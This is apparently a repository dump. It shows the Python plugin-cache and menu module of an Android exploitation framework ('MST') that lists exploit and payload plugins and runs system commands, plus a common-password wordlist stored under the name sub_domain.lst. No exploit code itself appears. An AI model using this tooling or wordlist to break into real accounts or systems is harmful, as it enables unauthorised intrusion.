15 | mstdb = 'cache/'
16 | plugp = 'plugins/'
17 | p_exp = 'exploit'
18 | p_pay = 'payload'
19 | p_mul = 'multi'
20 | mstcs = 'mst'
21 |
22 | class cache:
23 | '''MstCache=>Class::cache'''
24 | def start(self):
25 | '''start cache'''
26 | color.cprint("[*] Start mst ..",GREEN)
27 | self.inscache(self.getplus(p_exp),p_exp)
28 | self.inscache(self.getplus(p_pay),p_pay)
29 | self.inscache(self.getplus(p_mul),p_mul)
30 | self.banner()
31 |
32 | def inscache(self,c,p):
33 | if path.isfile(mstdb+'%s.txt'%p):
34 | remove(mstdb+'%s.txt'%p)
35 | for tmp in c:
36 | tmp=tmp[:len(tmp)-3]
37 | self.writetxt(('%s|%s|%s'%(p,tmp,p+'/'+tmp)),p)
38 |
39 | def writetxt(self,txt,txtname):
40 | try:
41 | fp = open(mstdb+'%s.txt'%txtname,'a')
42 | fp.write(txt+"\n")
43 | fp.close()
44 | except:
45 | return False
46 |
47 |
48 | def getplus(self,path):
49 | '''get plugins list'''
50 | return listdir(plugp+path)
51 |
52 | def find(self,r,t):
53 | '''re find'''
54 | try:
55 | return re.findall(r,t)
56 | except:
57 | return False
58 |
59 | def searchexp(self,c,p,sear):
60 | for tmp in c:
61 | tmp=tmp[:len(tmp)-3]
62 | tmpstr='%s'%(p+'/'+tmp)
63 | findok=self.find(sear,tmpstr)
64 | if findok:
65 | tmpstr='%s|%s|%s'%(p,tmpstr,tmpstr)
66 | find_list.append(tmpstr)
67 |
68 | def search(self,sear):
69 | '''search plugins'''
70 | global find_list
71 | find_list=['']
72 | msg="SEARCH '%s'"%sear
73 | color.cprint(msg,YELLOW)
74 | color.cprint("="*len(msg),GREY)
75 | self.searchexp(self.getplus(p_exp),p_exp,'%s'%sear)
76 | self.searchexp(self.getplus(p_pay),p_pay,'%s'%sear)
77 | self.searchexp(self.getplus(p_mul),p_mul,'%s'%sear)
78 | self.listmst(find_list)
79 |
80 | def listmst(self,result):
81 | '''format print results'''
82 | color.cprint("%5s %-60s %-7s"%("ID","PATH","TYPE"),YELLOW)
83 | color.cprint("%5s %-60s %-7s"%("-"*5,"-"*60,"-"*7),GREY)
84 | exp_id=range(len(result))
85 | for i in exp_id[1:]:
86 | tmp=result[int(i)]
87 | tmp=tmp.split('|')
88 | rid=i
89 | rty=tmp[0]
90 | rpa=tmp[1]
91 | if len(rpa)>70:
92 | rpa=rpa[:68]+".."
93 | color.cprint("%5s %-60s %-7s"%(rid,rpa,rty),CYAN)
94 | color.cprint("="*74,GREY)
95 | a=len(result)
96 | a=a-1
97 | color.cprint("COUNT [%s] RESULTS (*^_^*)"%a,GREEN)
98 |
99 | def opentxt(self,p):
100 | global exp_list
101 | global exp_id
102 | exp_list=['']
103 | try:
104 | for line in open(mstdb+'%s.txt'%p):
105 | exp_list.append(line)
106 | self.listmst(exp_list)
107 | except:
108 | color.cprint('[!] Err!',RED)
109 | color.cprint('[?] USAGE:show ',YELLOW)
110 |
111 | def showplus(self,p):
112 | '''show plugins'''
113 | pp=("show %s plugins"%p).upper()
114 | color.cprint(pp,YELLOW)
115 | color.cprint("="*len(pp),GREY)
116 | self.opentxt(p)
117 |
118 | def load(self,plugin):
119 | '''load plugins'''
120 | tmp=exp_list[int(plugin)]
121 | tmp=tmp.split('|')
122 | pt=tmp[0]
123 | plu=tmp[2]
124 | plu=plu[:-1]
125 | load.start(pt,plu)
126 |
127 | def getplunums(self,p):
128 | '''get plugins nums'''
129 | global exp_list
130 | global exp_id
131 | exp_list=['']
132 | for line in open(mstdb+'%s.txt'%p):
133 | exp_list.append(line)
134 | return len(exp_list)
135 |
136 | def mainhelp(self):
137 | '''show mainhelp'''
138 | color.cprint('MST HELP MENU',YELLOW)
139 | color.cprint('=============',GREY)
140 | color.cprint(' COMMAND DESCRIPTION',YELLOW)
141 | color.cprint(' ------- -----------',GREY,0)
142 | color.cprint('''
143 | help Displays the help menu
144 | exit Exit the MstApp
145 | cls Clear the screen
146 | show List the plugins
147 | search Search plugins
148 | use Use the plugin
149 | update Update mst|plugins''',CYAN)
150 | color.cprint('MST HELP::SHOW',YELLOW)
151 | color.cprint('==============',GREY)
152 | color.cprint(' COMMAND DESCRIPTION',YELLOW)
153 | color.cprint(' ------- -----------',GREY,0)
154 | color.cprint('''
155 | exploit List the exploit plugins
156 | payload List the payload plugins
157 | multi List the multi plugins''',CYAN)
158 |
159 | def usage(self,c):
160 | '''mst=>usage'''
161 | def ius(c):
162 | '''def's def =.='''
163 | color.cprint('[?] USAGE:%s'%c,YELLOW)
164 | if c == "search":
165 | ius('search ')
166 | elif c == "show":
167 | ius('show ')
168 | elif c == "use":
169 | ius('use ')
170 | elif c == "update":
171 | ius('update ')
172 |
173 | def ban1(self):
174 | '''banner 1'''
175 | color.cprint('''
176 | ,, , r22r r::,,:iii
177 | B@B ,@@2 @B@GB@@ rB@B@B@B@B
178 | @H@s @X@s @B X@
179 | @:,@, @G Bs i@B: GB
180 | @r M@ GB @s XB@Br G@
181 | Bs B@ iB, @s sB@ MB
182 | @s BSBs @s 2Bi M@
183 | B9 ;B@ ,BH B@BMG@BG @B
184 | : , : ,r22i ,:
185 | ''',RED)
186 | def ban2(self):
187 | color.cprint('''
188 |
189 | ,i77SSXrr, ,ii
190 | 7aWMMMMMMMMMMMMMMMMMMMMMMM
191 | 7@MMMMMMMMMMMMMMMMMMMMMMMMMMMM
192 | :MMMMMMMMMMMMMMMMMMMMMMMMMMMMM@
193 | WMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
194 | ,MMMMMMMMMMMMMMMMMMMMMMMMMMMM@
195 | MMMMMMMMMMMMMMMMMMMMMMMMMMMMM
196 | ,MMMMMMMMMMMMMMMMMMMMMMMMMMM@
197 | @MMMMMMMMMMMMMMMMMMMMMMMMMMM
198 | XMMMMMMMMMMMMMMMMMMMMMMMMMM@
199 | MMMMMMMMMMMMMMMMMMMMMMMMMMM
200 | MMMMMMMMMMMMMMMMMMMMMMMMMMM
201 | BMMMMMMMMMMMMMMMMMMMMMMMMMMr
202 | SMMMMMMMMMMMMMMMMMMMMMMMMMMM
203 | iMMMMMMMMMMMMMMMMMMMMMMMMMMMX 7;
204 | MMMMM@B8Z2SXXr;;;:,.,,. . . ,;XZBMMMMMM:
205 | S7,. ..::ii;;7XXX2ZBB@MMMMMMMMMMMMMMMi
206 | .:;72aZ8B@MMMMMMMMMMMMMMMMMMMMMMMMMMBaXi.
207 | BMMMMMMMMMMMMMMMMMMMMM8a22SXrr;i,:rZZZi
208 | XMMMMMWB0Za2X;,:MMMMMWS 7WM.
209 |
210 | ''',BLUE)
211 | def ban3(self):
212 | color.cprint('''
213 | ,-,
214 | -x#######=
215 | =########XX##+
216 | .x#########XxXx#x=
217 | X###########XxxXX#=-
218 | .##########X####Xxxxx=
219 | =###XXxX+xX#X##########x=-
220 | +#XxxX#######################=.
221 | -###########X++x+--;+x###########-
222 | =#########X;. . ;-X#########.
223 | +#########+, , , . ;#########
224 | -#########- . - -. .. ;+#######,
225 | =########+, =;. -- - ..=#####+
226 | .########- .; =; ,+- . X ; ,.X##x
227 | +#######+ ; -.-. =+. .#. = , .#x
228 | ,#######---- = , ;+, .x# ,X, - ;x#
229 | .#######+--= = == ;=-,, -X#===.x=##
230 | ;+X#=-x+=;- X#+,.,+++X=-#; ,;;x+#-.-
231 | - ####x#==--+-., X-.X;=#+; =x#
232 | .; -+-##. - X##= = .,X#+ -#,
233 | = x + ,. ; x=
234 | ;-,, + -;...,. ..;-x
235 | .##= x
236 | + = -;
237 | + -+.
238 | =X+,. ,==,
239 | ''',CYAN)
240 | def ban4(self):
241 | color.cprint('''
242 | .;+it+;+tt=:
243 | .iYi;=YY .IXXXI;
244 | :IXV, iX t+iRBV,
245 | IVItY ,#; =# , Y#=
246 | .XIttIt, Mi.XV#I ,; ,. :i
247 | RttYI, . :###Y ,;..., +:
248 | YItI= .,,: . =: :::
249 | Xtt+ ... :=Y#I .i;,,:+,
250 | RtI ,=itYRM######### V I
251 | XIt ::#################; ;R, =;
252 | iYI B###BRXVYVVVVBW#X tVItiV.
253 | VIi +BBRVVVVVVYVVBI ItttB:
254 | ::,.YY; +XWMMRRRRBB; tttiVi
255 | ,+,. ,:iV= ;iIIIII:,IM##XtiYY
256 | t. ,tXBt. :IRMt=XR, tIYI
257 | ,+. +titIYt;=RW#WRt;:;;M= Vt .;::
258 | .;;=YRItittttXBX: ,::: ,;V,,..,+;
259 | ,iYVItttitt ;,= +;
260 | ,iYVItiI , : t
261 | .;Ytt; ; .,.t =:
262 | :VtI; ... ..,:IY i.
263 | ;YttII=;:::;=iIIIIt :+
264 | = ItittttIIIIIYXVYYVY=:::==
265 | :; tIttttttIYXI=, ,,,
266 | =: tYIIIIVI=
267 | ,+ .,:.i,
268 | == ;,
269 | ,;;;;:
270 | ''',PURPLE)
271 | def banner(self):
272 | '''mst banner :)'''
273 | en=self.getplunums('exploit')
274 | pn=self.getplunums('payload')
275 | mn=self.getplunums('multi')
276 | choice([self.ban1,self.ban2,self.ban3,self.ban4])()
277 | #print u' =[ 感谢作者的开源'.encode('gb2312')
278 | print ' +=[',
279 | color.cprint('MST::For Android By Mr.x ',GREEN)
280 | print ' -+=[',
281 | color.cprint('VER::%s'%ver,CYAN)
282 | print ' + -- +=[',
283 | color.cprint('PLU::Exploits::%s Payloads::%s Multis::%s'%(en,pn,mn),YELLOW)
284 |
285 | def printmst(self):
286 | '''print mst..'''
287 | global mstcs
288 | color.cprint(mstcs,GREY,0)
289 |
290 | def execmd(self,cmd):
291 | '''run system command'''
292 | color.cprint('[*] EXEC:%s'%cmd,RED)
293 | system(cmd)
294 |
295 | def cls(self):
296 | '''clear'''
297 | if name == 'nt':
298 | system("cls")
299 | else:
300 | system("clear")
301 |
302 | def errmsg(self,msg):
303 | '''show error msg'''
304 | color.cprint("[!] Err:%s"%msg,RED)
305 |
306 | def mainexit(self):
307 | '''exit app'''
308 | color.cprint("\n[*] GoodBye :)",RED)
309 | exit(0)
310 |
311 | if __name__=='__main__':
312 | print __doc__
313 | else:
314 | cache=cache()
315 | #cache.start()
316 |
--------------------------------------------------------------------------------
/dicts/sub_domain.lst:
--------------------------------------------------------------------------------
1 | a
2 | aaa
3 | aaaaaa
4 | abc
5 | abc123
6 | abcd
7 | abcd1234
8 | abcde
9 | abcdef
10 | abcdefg
11 | access
12 | action
13 | active
14 | adam
15 | adidas
16 | adrian
17 | aggies
18 | aikman
19 | airhead
20 | alaska
21 | albert
22 | alex
23 | alexande
24 | alexandr
25 | alexis
26 | alfred
27 | alice
28 | alicia
29 | aliens
30 | alison
31 | allen
32 | allison
33 | allo
34 | alpha
35 | alpine
36 | alyssa
37 | amanda
38 | amber
39 | amelie
40 | america
41 | amiga
42 | amour
43 | amy
44 | anderson
45 | andre
46 | andrea
47 | andrew
48 | andy
49 | angel
50 | angela
51 | angels
52 | angie
53 | angus
54 | animal
55 | animals
56 | anna
57 | anne
58 | annie
59 | anthony
60 | apache
61 | apollo
62 | apple
63 | apples
64 | april
65 | archie
66 | arctic
67 | ariane
68 | ariel
69 | arizona
70 | arthur
71 | artist
72 | asdf
73 | asdfg
74 | asdfgh
75 | asdfghjk
76 | asdfghjkl
77 | asdfjkl
78 | asdfjkl;
79 | aspen
80 | ass
81 | asshole
82 | asterix
83 | ath
84 | athena
85 | attila
86 | august
87 | austin
88 | author
89 | avalon
90 | avatar
91 | awesome
92 | aylmer
93 | babies
94 | baby
95 | babylon
96 | bach
97 | badboy
98 | badger
99 | bailey
100 | balls
101 | bamboo
102 | banana
103 | bananas
104 | banane
105 | bandit
106 | barbara
107 | barbie
108 | barney
109 | barry
110 | basebal
111 | baseball
112 | basf
113 | basil
114 | basket
115 | basketb
116 | basketba
117 | bastard
118 | batman
119 | beagle
120 | beaner
121 | beanie
122 | bear
123 | bears
124 | beatles
125 | beautifu
126 | beaver
127 | beavis
128 | beer
129 | belle
130 | benjamin
131 | benny
132 | benoit
133 | benson
134 | bernard
135 | bernie
136 | bertha
137 | betty
138 | bigbird
139 | bigdog
140 | bigfoot
141 | bigmac
142 | bigman
143 | bigred
144 | bilbo
145 | bill
146 | billy
147 | bingo
148 | binky
149 | biology
150 | bird
151 | birdie
152 | bitch
153 | biteme
154 | black
155 | blackie
156 | blaster
157 | blazer
158 | blizzard
159 | blonde
160 | blondie
161 | blowfish
162 | blowme
163 | blue
164 | bluebird
165 | bluesky
166 | bmw
167 | bob
168 | bobby
169 | bobcat
170 | bond
171 | boner
172 | bonjour
173 | bonnie
174 | booboo
175 | booger
176 | boogie
177 | bookit
178 | boomer
179 | booster
180 | boots
181 | bootsie
182 | boris
183 | boss
184 | boston
185 | bowling
186 | bozo
187 | bradley
188 | brandi
189 | brandon
190 | brandy
191 | brasil
192 | braves
193 | brazil
194 | brenda
195 | brewster
196 | brian
197 | bridge
198 | bridges
199 | bright
200 | broncos
201 | brooke
202 | browns
203 | bruce
204 | brutus
205 | bubba
206 | bubbles
207 | buck
208 | buddha
209 | buddy
210 | buffalo
211 | buffy
212 | bull
213 | bulldog
214 | bullet
215 | bullshit
216 | bunny
217 | business
218 | buster
219 | butch
220 | butler
221 | butthead
222 | button
223 | buttons
224 | buzz
225 | byteme
226 | cactus
227 | caesar
228 | caitlin
229 | californ
230 | calvin
231 | camaro
232 | camera
233 | campbell
234 | camping
235 | canada
236 | canced
237 | cancer
238 | candy
239 | canela
240 | cannon
241 | cannonda
242 | canon
243 | captain
244 | cardinal
245 | carl
246 | carlos
247 | carmen
248 | carol
249 | carole
250 | carolina
251 | caroline
252 | carrie
253 | cascade
254 | casey
255 | casio
256 | casper
257 | cassie
258 | castle
259 | cat
260 | catalog
261 | catfish
262 | cats
263 | cccccc
264 | cedic
265 | celica
266 | celine
267 | celtics
268 | center
269 | cesar
270 | cfi
271 | cfj
272 | cgj
273 | challeng
274 | champion
275 | champs
276 | chance
277 | chanel
278 | changeme
279 | chaos
280 | chapman
281 | charity
282 | charles
283 | charlie
284 | charlott
285 | cheese
286 | chelsea
287 | cherry
288 | cheryl
289 | chester
290 | chevy
291 | chicago
292 | chicken
293 | chico
294 | chiefs
295 | china
296 | chip
297 | chipper
298 | chiquita
299 | chloe
300 | chocolat
301 | chris
302 | chrissy
303 | christ
304 | christia
305 | christin
306 | christop
307 | christy
308 | chuck
309 | chucky
310 | church
311 | cinder
312 | cindi
313 | cindy
314 | claire
315 | clancy
316 | clark
317 | class
318 | classroo
319 | claude
320 | claudia
321 | cleaner
322 | clipper
323 | cloclo
324 | clover
325 | cobra
326 | cocacola
327 | coco
328 | coffee
329 | coke
330 | colleen
331 | college
332 | colorado
333 | coltrane
334 | columbia
335 | compaq
336 | compton
337 | compute
338 | computer
339 | concept
340 | connect
341 | connie
342 | conrad
343 | control
344 | cookie
345 | cookies
346 | cool
347 | coolman
348 | cooper
349 | copper
350 | corona
351 | corrado
352 | corwin
353 | cosmos
354 | cougar
355 | cougars
356 | country
357 | courtney
358 | cowboy
359 | cowboys
360 | coyote
361 | cracker
362 | craig
363 | crapp
364 | crawford
365 | creative
366 | cricket
367 | crow
368 | cruise
369 | crystal
370 | cuddles
371 | curtis
372 | cutie
373 | cyclone
374 | cynthia
375 | cyrano
376 | daddy
377 | daisy
378 | dakota
379 | dallas
380 | dan
381 | dance
382 | dancer
383 | daniel
384 | danielle
385 | danny
386 | darren
387 | darwin
388 | dasha
389 | database
390 | dave
391 | david
392 | dawn
393 | daytek
394 | dead
395 | deadhead
396 | dean
397 | death
398 | debbie
399 | december
400 | deedee
401 | defense
402 | deliver
403 | delta
404 | demo
405 | denali
406 | denise
407 | dennis
408 | denver
409 | depeche
410 | derek
411 | design
412 | detroit
413 | deutsch
414 | dexter
415 | diablo
416 | diamond
417 | diana
418 | diane
419 | dickhead
420 | digger
421 | digital
422 | dilbert
423 | direct
424 | director
425 | dirk
426 | disney
427 | dixie
428 | doc
429 | doctor
430 | dodger
431 | dodgers
432 | dog
433 | dogbert
434 | doggie
435 | doggy
436 | dollars
437 | dolphin
438 | dolphins
439 | dominic
440 | domino
441 | don
442 | donald
443 | donkey
444 | donna
445 | doobie
446 | doogie
447 | dookie
448 | doom
449 | dorothy
450 | doug
451 | dougie
452 | douglas
453 | dragon
454 | dream
455 | dreamer
456 | dreams
457 | drizzt
458 | drums
459 | duck
460 | duckie
461 | dude
462 | duke
463 | dundee
464 | dustin
465 | dusty
466 | dwight
467 | dylan
468 | e-mail
469 | eagle
470 | eagles
471 | easter
472 | eatme
473 | eclipse
474 | eddie
475 | edward
476 | eeyore
477 | einstein
478 | elaine
479 | electric
480 | elephant
481 | elizabet
482 | ellen
483 | elliot
484 | elsie
485 | elvis
486 | elwood
487 | email
488 | emily
489 | emmitt
490 | energy
491 | enigma
492 | enter
493 | entropy
494 | eric
495 | espanol
496 | etoile
497 | eugene
498 | europe
499 | excalibu
500 | except
501 | explorer
502 | export
503 | express
504 | faith
505 | falcon
506 | family
507 | farmer
508 | farming
509 | felix
510 | fender
511 | ferrari
512 | ferret
513 | ffffff
514 | fgh
515 | fiction
516 | fiona
517 | fire
518 | fireball
519 | firebird
520 | fireman
521 | first
522 | fish
523 | fisher
524 | fishing
525 | flamingo
526 | flash
527 | fletch
528 | fletcher
529 | flight
530 | flip
531 | flipper
532 | florida
533 | flower
534 | flowers
535 | floyd
536 | fluffy
537 | flyers
538 | foobar
539 | fool
540 | footbal
541 | football
542 | ford
543 | forest
544 | fountain
545 | fox
546 | foxtrot
547 | fozzie
548 | france
549 | francis
550 | francois
551 | frank
552 | frankie
553 | franklin
554 | fred
555 | freddy
556 | frederic
557 | freedom
558 | french
559 | friday
560 | friend
561 | friends
562 | frodo
563 | frog
564 | froggy
565 | frogs
566 | front
567 | frosty
568 | fubar
569 | fucker
570 | fuckme
571 | fuckoff
572 | fuckyou
573 | fugazi
574 | fun
575 | future
576 | gabriel
577 | gabriell
578 | gaby
579 | galaxy
580 | galileo
581 | gambit
582 | gandalf
583 | garden
584 | garfield
585 | garlic
586 | garnet
587 | garrett
588 | gary
589 | gasman
590 | gateway
591 | gator
592 | gemini
593 | general
594 | genesis
595 | genius
596 | george
597 | georgia
598 | gerald
599 | german
600 | ghost
601 | giants
602 | gibson
603 | gilles
604 | ginger
605 | gizmo
606 | glenn
607 | global
608 | go
609 | goalie
610 | goat
611 | goblue
612 | gocougs
613 | godzilla
614 | gofish
615 | goforit
616 | gold
617 | golden
618 | goldie
619 | golf
620 | golfer
621 | golfing
622 | gone
623 | goober
624 | goofy
625 | gopher
626 | gordon
627 | grace
628 | grandma
629 | grant
630 | graphic
631 | grateful
632 | gray
633 | graymail
634 | green
635 | greenday
636 | greg
637 | gregory
638 | gretchen
639 | gretzky
640 | griffey
641 | groovy
642 | grover
643 | grumpy
644 | guess
645 | guest
646 | guido
647 | guinness
648 | guitar
649 | gunner
650 | gymnast
651 | h2opolo
652 | hacker
653 | hal
654 | hammer
655 | hamster
656 | hanna
657 | hannah
658 | hansolo
659 | hanson
660 | happy
661 | happyday
662 | harley
663 | harold
664 | harrison
665 | harry
666 | harvey
667 | hatton
668 | hawaii
669 | hawk
670 | hawkeye
671 | hazel
672 | health
673 | heart
674 | hearts
675 | heather
676 | hector
677 | heidi
678 | helen
679 | hell
680 | hello
681 | help
682 | helpme
683 | hendrix
684 | henry
685 | herbert
686 | herman
687 | hermes
688 | hershey
689 | history
690 | hobbit
691 | hockey
692 | hola
693 | holly
694 | home
695 | homebrew
696 | homer
697 | honda
698 | honey
699 | hoops
700 | hootie
701 | horizon
702 | hornet
703 | hornets
704 | horse
705 | horses
706 | hotdog
707 | hotrod
708 | house
709 | houston
710 | howard
711 | hunter
712 | hunting
713 | huskers
714 | icecream
715 | iceman
716 | idiot
717 | iguana
718 | iloveyou
719 | image
720 | imagine
721 | impala
722 | indian
723 | indiana
724 | indigo
725 | info
726 | informix
727 | insane
728 | inside
729 | intel
730 | intern
731 | internet
732 | ireland
733 | irene
734 | irish
735 | ironman
736 | isaac
737 | isabelle
738 | isis
739 | island
740 | italia
741 | italy
742 | jack
743 | jackie
744 | jackson
745 | jacob
746 | jaeger
747 | jaguar
748 | jake
749 | jamaica
750 | james
751 | jan
752 | jane
753 | janice
754 | january
755 | japan
756 | jared
757 | jasmin
758 | jasmine
759 | jason
760 | jasper
761 | jazz
762 | jean
763 | jeanette
764 | jeanne
765 | jeff
766 | jeffrey
767 | jenifer
768 | jenni
769 | jennifer
770 | jenny
771 | jensen
772 | jeremy
773 | jerry
774 | jessica
775 | jessie
776 | jester
777 | jesus
778 | jewels
779 | jim
780 | jimbo
781 | jimbob
782 | jkm
783 | joanna
784 | joe
785 | joel
786 | joey
787 | john
788 | johnny
789 | johnson
790 | jojo
791 | joker
792 | jonathan
793 | jordan
794 | joseph
795 | josh
796 | joshua
797 | josie
798 | jsbach
799 | judith
800 | judy
801 | julia
802 | julian
803 | julie
804 | junebug
805 | junior
806 | jupiter
807 | justice
808 | justin
809 | karen
810 | katherin
811 | kathleen
812 | kathryn
813 | kathy
814 | katie
815 | kayla
816 | keith
817 | kelly
818 | kelsey
819 | kennedy
820 | kenneth
821 | kermit
822 | kevin
823 | khan
824 | kids
825 | killer
826 | killme
827 | kim
828 | kimberly
829 | kinder
830 | king
831 | kingdom
832 | kingfish
833 | kitten
834 | kittens
835 | kitty
836 | kleenex
837 | knicks
838 | knight
839 | knights
840 | koala
841 | koko
842 | kombat
843 | kramer
844 | kristen
845 | kristi
846 | kristin
847 | kristy
848 | krystal
849 | lacrosse
850 | laddie
851 | lady
852 | ladybug
853 | lakers
854 | lakota
855 | lamer
856 | larry
857 | larson
858 | laser
859 | laura
860 | lauren
861 | laurie
862 | law
863 | ledzep
864 | lee
865 | legend
866 | lennon
867 | leon
868 | leonard
869 | leslie
870 | lestat
871 | letmein
872 | letter
873 | library
874 | light
875 | lincoln
876 | linda
877 | lindsay
878 | lindsey
879 | lionking
880 | lisa
881 | little
882 | liverpoo
883 | lizard
884 | lloyd
885 | logan
886 | logical
887 | london
888 | looney
889 | lorraine
890 | loser
891 | louis
892 | louise
893 | love
894 | lovely
895 | loveme
896 | lover
897 | loveyou
898 | lucas
899 | lucky
900 | lucy
901 | lulu
902 | lynn
903 | mac
904 | macha
905 | macintos
906 | maddock
907 | maddog
908 | madison
909 | maggie
910 | magic
911 | magnum
912 | mailer
913 | mailman
914 | major
915 | majordom
916 | malcolm
917 | malibu
918 | mantra
919 | marc
920 | marcel
921 | marcus
922 | margaret
923 | maria
924 | mariah
925 | marie
926 | marilyn
927 | marina
928 | marine
929 | marino
930 | mario
931 | mariposa
932 | mark
933 | market
934 | marlboro
935 | marley
936 | mars
937 | marshal
938 | martha
939 | martin
940 | marty
941 | marvin
942 | mary
943 | maryjane
944 | master
945 | masters
946 | math
947 | matrix
948 | matt
949 | matthew
950 | maurice
951 | maveric
952 | maverick
953 | max
954 | maxime
955 | maxwell
956 | mazda
957 | mayday
958 | me
959 | medical
960 | megan
961 | melanie
962 | melissa
963 | memory
964 | memphis
965 | meow
966 | mercedes
967 | mercury
968 | merlin
969 | metal
970 | metallic
971 | mexico
972 | michael
973 | michel
974 | michele
975 | michell
976 | michelle
977 | mickey
978 | micro
979 | midnight
980 | midori
981 | mikael
982 | mike
983 | mikey
984 | miki
985 | miles
986 | miller
987 | millie
988 | million
989 | mimi
990 | mindy
991 | mine
992 | minnie
993 | minou
994 | mirage
995 | miranda
996 | mirror
997 | misha
998 | mishka
999 | mission
1000 | missy
1001 | misty
1002 | mitch
1003 | mitchell
1004 | mittens
1005 | modem
1006 | molly
1007 | molson
1008 | mom
1009 | monday
1010 | monet
1011 | money
1012 | monica
1013 | monique
1014 | monkey
1015 | monopoly
1016 | monster
1017 | montana
1018 | montreal
1019 | moocow
1020 | mookie
1021 | moomoo
1022 | moon
1023 | moose
1024 | morgan
1025 | moroni
1026 | morris
1027 | mortimer
1028 | mother
1029 | mountain
1030 | mouse
1031 | mozart
1032 | muffin
1033 | murphy
1034 | music
1035 | mustang
1036 | nancy
1037 | naomi
1038 | napoleon
1039 | nascar
1040 | nat
1041 | natasha
1042 | nathan
1043 | nautica
1044 | ncc
1045 | ne
1046 | nebraska
1047 | nellie
1048 | nelson
1049 | nemesis
1050 | nesbitt
1051 | netware
1052 | network
1053 | new
1054 | newcourt
1055 | newpass
1056 | news
1057 | newton
1058 | newuser
1059 | newyork
1060 | nguyen
1061 | nicarao
1062 | nicholas
1063 | nick
1064 | nicole
1065 | niki
1066 | nikita
1067 | nimrod
1068 | niners
1069 | nirvana
1070 | nissan
1071 | nite
1072 | none
1073 | norman
1074 | nothing
1075 | notused
1076 | nss
1077 | nugget
1078 | number
1079 | nurse
1080 | oatmeal
1081 | obiwan
1082 | october
1083 | olive
1084 | oliver
1085 | olivia
1086 | olivier
1087 | one
1088 | online
1089 | open
1090 | opus
1091 | orange
1092 | oranges
1093 | orchid
1094 | orion
1095 | orlando
1096 | oscar
1097 | ou
1098 | oxford
1099 | pacers
1100 | pacific
1101 | packard
1102 | packer
1103 | packers
1104 | painter
1105 | paladin
1106 | pamela
1107 | panda
1108 | pandora
1109 | pantera
1110 | panther
1111 | papa
1112 | paris
1113 | parker
1114 | parrot
1115 | pascal
1116 | pass
1117 | passion
1118 | passwd
1119 | passwor
1120 | password
1121 | pat
1122 | patches
1123 | patricia
1124 | patrick
1125 | paul
1126 | paula
1127 | peace
1128 | peaches
1129 | peanut
1130 | pearl
1131 | pearljam
1132 | pebbles
1133 | pedro
1134 | peewee
1135 | peggy
1136 | penelope
1137 | penguin
1138 | penny
1139 | pentium
1140 | people
1141 | pepper
1142 | pepsi
1143 | percy
1144 | perry
1145 | pete
1146 | peter
1147 | petey
1148 | petunia
1149 | phantom
1150 | phil
1151 | philip
1152 | phillip
1153 | phish
1154 | phoenix
1155 | photo
1156 | piano
1157 | picard
1158 | picasso
1159 | pickle
1160 | picture
1161 | pierce
1162 | pierre
1163 | piglet
1164 | pinkfloy
1165 | pirate
1166 | pisces
1167 | pizza
1168 | planet
1169 | plato
1170 | play
1171 | playboy
1172 | player
1173 | players
1174 | please
1175 | pluto
1176 | pmc
1177 | poiuyt
1178 | polaris
1179 | police
1180 | politics
1181 | polo
1182 | pomme
1183 | poohbear
1184 | pookie
1185 | popcorn
1186 | popeye
1187 | porsche
1188 | porter
1189 | portland
1190 | power
1191 | ppp
1192 | praise
1193 | preston
1194 | prince
1195 | princess
1196 | prof
1197 | promethe
1198 | property
1199 | protel
1200 | psalms
1201 | psycho
1202 | public
1203 | puckett
1204 | pumpkin
1205 | punkin
1206 | puppies
1207 | puppy
1208 | puppy123
1209 | purple
1210 | pyramid
1211 | python
1212 | qazwsx
1213 | quality
1214 | quebec
1215 | quest
1216 | qwaszx
1217 | qwert
1218 | qwerty
1219 | rabbit
1220 | racerx
1221 | rachel
1222 | racing
1223 | racoon
1224 | radio
1225 | raider
1226 | raiders
1227 | rain
1228 | rainbow
1229 | raistlin
1230 | rambo
1231 | random
1232 | randy
1233 | ranger
1234 | raptor
1235 | raquel
1236 | rascal
1237 | rasta
1238 | raven
1239 | raymond
1240 | reader
1241 | reading
1242 | reality
1243 | rebecca
1244 | rebels
1245 | red
1246 | reddog
1247 | redrum
1248 | redskin
1249 | redwing
1250 | reebok
1251 | reefer
1252 | reggie
1253 | remember
1254 | renee
1255 | republic
1256 | research
1257 | retard
1258 | reynolds
1259 | reznor
1260 | rhonda
1261 | richard
1262 | ricky
1263 | ripper
1264 | river
1265 | robbie
1266 | robert
1267 | robin
1268 | robinhoo
1269 | robotech
1270 | rock
1271 | rocket
1272 | rocky
1273 | rodman
1274 | roger
1275 | roman
1276 | ronald
1277 | rooster
1278 | roping
1279 | rose
1280 | rosebud
1281 | roses
1282 | rosie
1283 | roxy
1284 | roy
1285 | royal
1286 | royals
1287 | ruby
1288 | rufus
1289 | rugby
1290 | runner
1291 | running
1292 | russel
1293 | russell
1294 | rusty
1295 | ruth
1296 | rux
1297 | ruy
1298 | ryan
1299 | sabrina
1300 | sadie
1301 | safety
1302 | sailing
1303 | sailor
1304 | sales
1305 | sally
1306 | salmon
1307 | salut
1308 | sam
1309 | samantha
1310 | sammie
1311 | sammy
1312 | sampler
1313 | sampson
1314 | samson
1315 | samuel
1316 | sanders
1317 | sandra
1318 | sandy
1319 | sango
1320 | santa
1321 | sapphire
1322 | sarah
1323 | sasha
1324 | saskia
1325 | sassy
1326 | saturn
1327 | savage
1328 | sbdc
1329 | scarlet
1330 | scarlett
1331 | school
1332 | science
1333 | scooby
1334 | scooter
1335 | scorpio
1336 | scorpion
1337 | scotch
1338 | scott
1339 | scotty
1340 | scout
1341 | scruffy
1342 | scuba
1343 | sean
1344 | seattle
1345 | secret
1346 | security
1347 | sendit
1348 | senior
1349 | septembe
1350 | sergei
1351 | service
1352 | seven
1353 | sexy
1354 | shadow
1355 | shadows
1356 | shalom
1357 | shannon
1358 | shanti
1359 | shark
1360 | sharon
1361 | shawn
1362 | sheba
1363 | sheena
1364 | sheila
1365 | shelby
1366 | shelley
1367 | shelly
1368 | sherry
1369 | shirley
1370 | shit
1371 | shithead
1372 | shoes
1373 | shooter
1374 | shorty
1375 | shotgun
1376 | sidney
1377 | sierra
1378 | silver
1379 | simba
1380 | simon
1381 | simple
1382 | singer
1383 | skater
1384 | skeeter
1385 | skidoo
1386 | skiing
1387 | skinny
1388 | skipper
1389 | skippy
1390 | slacker
1391 | slayer
1392 | smashing
1393 | smile
1394 | smiles
1395 | smiley
1396 | smiths
1397 | smokey
1398 | snake
1399 | snapple
1400 | snicker
1401 | snickers
1402 | sniper
1403 | snoopdog
1404 | snoopy
1405 | snow
1406 | snowbal
1407 | snowman
1408 | snuffy
1409 | soccer
1410 | softball
